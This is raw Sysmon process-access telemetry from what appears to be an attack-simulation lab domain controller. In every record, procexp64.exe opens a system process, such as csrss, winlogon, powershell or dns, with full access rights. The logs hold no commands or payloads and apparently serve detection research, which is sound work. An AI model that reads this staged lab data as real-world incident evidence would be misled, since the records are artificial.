15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 